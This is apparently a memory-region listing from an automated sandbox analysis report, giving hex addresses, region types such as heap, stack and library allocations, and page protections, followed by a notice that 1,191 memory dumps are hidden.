trusted library allocation
|
page read and write
|
||
|
1F6068D2000
|
trusted library allocation
|
page read and write
|
||
|
1875DB00000
|
heap
|
page execute and read and write
|
||
|
2FDD000
|
heap
|
page read and write
|
||
|
2EC0000
|
system
|
page execute and read and write
|
||
|
2C12E3E000
|
stack
|
page read and write
|
||
|
33B0000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2AAA8741000
|
heap
|
page read and write
|
||
|
308E000
|
stack
|
page read and write
|
||
|
1B5E7646000
|
trusted library allocation
|
page read and write
|
||
|
1B5E5722000
|
trusted library allocation
|
page read and write
|
||
|
C0000
|
unkown
|
page readonly
|
||
|
1280000
|
heap
|
page read and write
|
||
|
2C12CB8000
|
stack
|
page read and write
|
||
|
7F1C000
|
heap
|
page read and write
|
||
|
54470F8000
|
stack
|
page read and write
|
||
|
331E000
|
stack
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2F5F4000
|
system
|
page read and write
|
||
|
2AAA8679000
|
heap
|
page read and write
|
||
|
AF003BE000
|
stack
|
page read and write
|
||
|
2AAA8712000
|
heap
|
page read and write
|
||
|
2A0000
|
unkown
|
page readonly
|
||
|
1875C0F7000
|
heap
|
page read and write
|
||
|
853E000
|
stack
|
page read and write
|
||
|
7FFD34523000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F6049C8000
|
heap
|
page read and write
|
||
|
7FFD34740000
|
trusted library allocation
|
page read and write
|
||
|
1B5E776D000
|
trusted library allocation
|
page read and write
|
||
|
A0000
|
unkown
|
page readonly
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
7FFD34730000
|
trusted library allocation
|
page read and write
|
||
|
85FF000
|
stack
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2C12D39000
|
stack
|
page read and write
|
||
|
1170000
|
unkown
|
page readonly
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1B5F828C000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1141000
|
unkown
|
page readonly
|
||
|
20C0000
|
heap
|
page read and write
|
||
|
2AAAA499000
|
heap
|
page read and write
|
||
|
7FFD34530000
|
trusted library allocation
|
page read and write
|
||
|
3852000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
698000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
7FFD34873000
|
trusted library allocation
|
page read and write
|
||
|
2AAA8685000
|
heap
|
page read and write
|
||
|
37FE000
|
direct allocation
|
page execute and read and write
|
||
|
2AAAA48F000
|
heap
|
page read and write
|
||
|
7FFD346C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
|
2F44000
|
heap
|
page read and write
|
||
|
7FFD345B6000
|
trusted library allocation
|
page read and write
|
||
|
3B08000
|
unkown
|
page execute and read and write
|
||
|
2B0000
|
unkown
|
page readonly
|
||
|
890000
|
unkown
|
page readonly
|
||
|
32B4000
|
heap
|
page read and write
|
||
|
2FBE000
|
heap
|
page read and write
|
||
|
2C129FD000
|
stack
|
page read and write
|
||
|
2382000
|
unkown
|
page read and write
|
||
|
2F53000
|
heap
|
page read and write
|
||
|
21B3DB02000
|
heap
|
page read and write
|
||
|
1F604A2F000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
54472FE000
|
stack
|
page read and write
|
||
|
D2C95FB000
|
stack
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
3B7A000
|
unkown
|
page execute and read and write
|
||
|
660000
|
unkown
|
page read and write
|
||
|
7FFD34710000
|
trusted library allocation
|
page read and write
|
||
|
2AAAA480000
|
heap
|
page read and write
|
||
|
1B5E55B5000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1F61E99D000
|
heap
|
page read and write
|
||
|
7FFD34810000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
D2C92FE000
|
stack
|
page read and write
|
||
|
112E000
|
stack
|
page read and write
|
||
|
3F0000
|
unkown
|
page read and write
|
||
|
1876DEE3000
|
trusted library allocation
|
page read and write
|
||
|
2EF32000
|
system
|
page read and write
|
||
|
1B5E5667000
|
heap
|
page read and write
|
||
|
7F43000
|
heap
|
page read and write
|
||
|
640000
|
heap
|
page read and write
|
||
|
327B000
|
stack
|
page read and write
|
||
|
7FFD34830000
|
trusted library allocation
|
page read and write
|
||
|
2F42000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
A85237E000
|
unkown
|
page readonly
|
||
|
1220000
|
heap
|
page read and write
|
||
|
2E98000
|
stack
|
page read and write
|
||
|
2AAA8628000
|
heap
|
page read and write
|
||
|
7FFD348A0000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2A0000
|
unkown
|
page readonly
|
||
|
7FFD34503000
|
trusted library allocation
|
page execute and read and write
|
||
|
22C000
|
stack
|
page read and write
|
||
|
DF0000
|
unkown
|
page readonly
|
||
|
21B42E00000
|
heap
|
page read and write
|
||
|
84FF000
|
stack
|
page read and write
|
||
|
711A000
|
unclassified section
|
page execute and read and write
|
||
|
7FFD34810000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
A85357E000
|
unkown
|
page readonly
|
||
|
2F4D000
|
heap
|
page read and write
|
||
|
DF0000
|
unkown
|
page readonly
|
||
|
5446FF9000
|
stack
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
597A000
|
unkown
|
page execute and read and write
|
||
|
7ECB000
|
heap
|
page read and write
|
||
|
7FFD34620000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E5B000
|
stack
|
page read and write
|
||
|
2C12A7E000
|
stack
|
page read and write
|
||
|
1B5E892B000
|
trusted library allocation
|
page read and write
|
||
|
1F606D46000
|
trusted library allocation
|
page read and write
|
||
|
1B5E55BD000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1F606330000
|
heap
|
page execute and read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
386E000
|
stack
|
page read and write
|
||
|
2AAAA4A6000
|
heap
|
page read and write
|
||
|
21D0000
|
unkown
|
page readonly
|
||
|
D2C90FD000
|
stack
|
page read and write
|
||
|
5447077000
|
stack
|
page read and write
|
||
|
D2C8BFE000
|
stack
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
A85287E000
|
unkown
|
page readonly
|
||
|
30E4000
|
heap
|
page read and write
|
||
|
3A72000
|
unclassified section
|
page read and write
|
||
|
2B0000
|
unkown
|
page readonly
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2AAA8620000
|
heap
|
page read and write
|
||
|
2AAA870A000
|
heap
|
page read and write
|
||
|
32B4000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1B5E5780000
|
heap
|
page read and write
|
||
|
3C20000
|
direct allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1875E476000
|
trusted library allocation
|
page read and write
|
||
|
1B5FFB40000
|
trusted library section
|
page read and write
|
||
|
21B431F0000
|
remote allocation
|
page read and write
|
||
|
A853279000
|
stack
|
page read and write
|
||
|
7EDA000
|
heap
|
page read and write
|
||
|
1F60688E000
|
trusted library allocation
|
page read and write
|
||
|
34B0000
|
trusted library allocation
|
page read and write
|
||
|
392D000
|
direct allocation
|
page execute and read and write
|
||
|
39FD000
|
direct allocation
|
page execute and read and write
|
||
|
1220000
|
heap
|
page read and write
|
||
|
2C12B7F000
|
stack
|
page read and write
|
||
|
2FA7000
|
heap
|
page read and write
|
||
|
610000
|
unkown
|
page read and write
|
||
|
1F606DF2000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
7F3B000
|
heap
|
page read and write
|
||
|
21B3DA7A000
|
heap
|
page read and write
|
||
|
1875D9C0000
|
heap
|
page readonly
|
||
|
2AAA867A000
|
heap
|
page read and write
|
||
|
1F6168B3000
|
trusted library allocation
|
page read and write
|
||
|
260000
|
unkown
|
page readonly
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1875C0B3000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
7FFD34720000
|
trusted library allocation
|
page read and write
|
||
|
1875DB20000
|
heap
|
page read and write
|
||
|
21B44000000
|
heap
|
page read and write
|
||
|
32D0000
|
heap
|
page read and write
|
||
|
32B4000
|
heap
|
page read and write
|
||
|
3F0000
|
unkown
|
page read and write
|
||
|
18776093000
|
heap
|
page read and write
|
||
|
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
|
21B3E980000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1B5E8E40000
|
trusted library allocation
|
page read and write
|
||
|
21B3DA94000
|
heap
|
page read and write
|
||
|
A8528FE000
|
stack
|
page read and write
|
||
|
2AAAA402000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1F606953000
|
trusted library allocation
|
page read and write
|
||
|
D2C8AF6000
|
stack
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
7FFD346D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F606830000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1480000
|
unkown
|
page readonly
|
||
|
21B3EDA1000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1B5E7648000
|
trusted library allocation
|
page read and write
|
||
|
2AAA86CA000
|
heap
|
page read and write
|
||
|
C30000
|
unkown
|
page readonly
|
||
|
7FFD34710000
|
trusted library allocation
|
page execute and read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1F60685B000
|
trusted library allocation
|
page read and write
|
||
|
1B5E56E4000
|
heap
|
page read and write
|
||
|
3A0000
|
heap
|
page read and write
|
||
|
1875C0FC000
|
heap
|
page read and write
|
||
|
1B5E767D000
|
trusted library allocation
|
page read and write
|
||
|
1F61EB17000
|
heap
|
page execute and read and write
|
||
|
2AAA8744000
|
heap
|
page read and write
|
||
|
1B5FF469000
|
heap
|
page read and write
|
||
|
DE0000
|
unkown
|
page readonly
|
||
|
1B5E8F06000
|
trusted library allocation
|
page read and write
|
||
|
1B5E55BB000
|
heap
|
page read and write
|
||
|
2AAAA57D000
|
heap
|
page read and write
|
||
|
2AAAA43B000
|
heap
|
page read and write
|
||
|
3571000
|
heap
|
page read and write
|
||
|
2AAA874A000
|
heap
|
page read and write
|
||
|
33A7000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32B4000
|
heap
|
page read and write
|
||
|
2FA7000
|
heap
|
page read and write
|
||
|
277000
|
unkown
|
page readonly
|
||
|
1875DE91000
|
trusted library allocation
|
page read and write
|
||
|
277000
|
unkown
|
page readonly
|
||
|
2AAA8650000
|
heap
|
page read and write
|
||
|
1B5E5720000
|
trusted library allocation
|
page read and write
|
||
|
32B4000
|
heap
|
page read and write
|
||
|
7F49000
|
heap
|
page read and write
|
||
|
2AAAA473000
|
heap
|
page read and write
|
||
|
1875D9D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD346E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7EB5000
|
heap
|
page read and write
|
||
|
32B4000
|
heap
|
page read and write
|
||
|
847D000
|
stack
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
66DE000
|
stack
|
page read and write
|
||
|
1875C0AF000
|
heap
|
page read and write
|
||
|
2AAA86BC000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
7F3E000
|
heap
|
page read and write
|
||
|
1B5F7271000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
A85297E000
|
unkown
|
page readonly
|
||
|
7FFD34700000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F6049C6000
|
heap
|
page read and write
|
||
|
1875DA16000
|
heap
|
page execute and read and write
|
||
|
21B430AE000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34502000
|
trusted library allocation
|
page read and write
|
||
|
544727E000
|
stack
|
page read and write
|
||
|
7F3B000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
4D5F000
|
stack
|
page read and write
|
||
|
7F02000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1B5FF680000
|
heap
|
page execute and read and write
|
||
|
39B2000
|
unclassified section
|
page read and write
|
||
|
7FFD34800000
|
trusted library allocation
|
page read and write
|
||
|
1876DE80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34750000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3489B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD347C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD345DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1010000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
2AAAA470000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
35E1000
|
heap
|
page read and write
|
||
|
7FFD34730000
|
trusted library allocation
|
page read and write
|
||
|
21B431A0000
|
trusted library allocation
|
page read and write
|
||
|
2F30000
|
heap
|
page read and write
|
||
|
5447DCE000
|
stack
|
page read and write
|
||
|
531A000
|
unclassified section
|
page execute and read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1876DE71000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
39F9000
|
direct allocation
|
page execute and read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1F604B65000
|
heap
|
page read and write
|
||
|
21B42E87000
|
heap
|
page read and write
|
||
|
B0000
|
unkown
|
page readonly
|
||
|
33AA000
|
heap
|
page read and write
|
||
|
7ED0000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
21B43070000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1F606C24000
|
trusted library allocation
|
page read and write
|
||
|
260000
|
unkown
|
page readonly
|
||
|
33A9000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
7FC0000
|
trusted library allocation
|
page read and write
|
||
|
1875DFB4000
|
trusted library allocation
|
page read and write
|
||
|
2AAAA452000
|
heap
|
page read and write
|
||
|
260000
|
unkown
|
page readonly
|
||
|
21B43090000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
7F3E000
|
heap
|
page read and write
|
||
|
30D0000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1F604900000
|
heap
|
page read and write
|
||
|
1F606E6A000
|
trusted library allocation
|
page read and write
|
||
|
7ED5000
|
heap
|
page read and write
|
||
|
7FFD34730000
|
trusted library allocation
|
page read and write
|
||
|
1B5FF723000
|
heap
|
page read and write
|
||
|
2AAA8686000
|
heap
|
page read and write
|
||
|
1B5F84E4000
|
trusted library allocation
|
page read and write
|
||
|
7F1F000
|
heap
|
page read and write
|
||
|
21B42E2C000
|
heap
|
page read and write
|
||
|
12A8000
|
unkown
|
page read and write
|
||
|
1B5E8611000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34893000
|
trusted library allocation
|
page read and write
|
||
|
2AAAA574000
|
heap
|
page read and write
|
||
|
690000
|
heap
|
page read and write
|
||
|
7FFD34630000
|
trusted library allocation
|
page execute and read and write
|
||
|
21B43094000
|
trusted library allocation
|
page read and write
|
||
|
7FFD347E0000
|
trusted library allocation
|
page read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1B5E8B37000
|
trusted library allocation
|
page read and write
|
||
|
21B3E35A000
|
heap
|
page read and write
|
||
|
2F48000
|
heap
|
page read and write
|
||
|
1B5E8428000
|
trusted library allocation
|
page read and write
|
||
|
A8538FE000
|
stack
|
page read and write
|
||
|
2FC7000
|
heap
|
page read and write
|
||
|
3660000
|
direct allocation
|
page execute and read and write
|
||
|
32D1000
|
heap
|
page read and write
|
||
|
1F616841000
|
trusted library allocation
|
page read and write
|
There are 1191 hidden memdumps, click here to show them.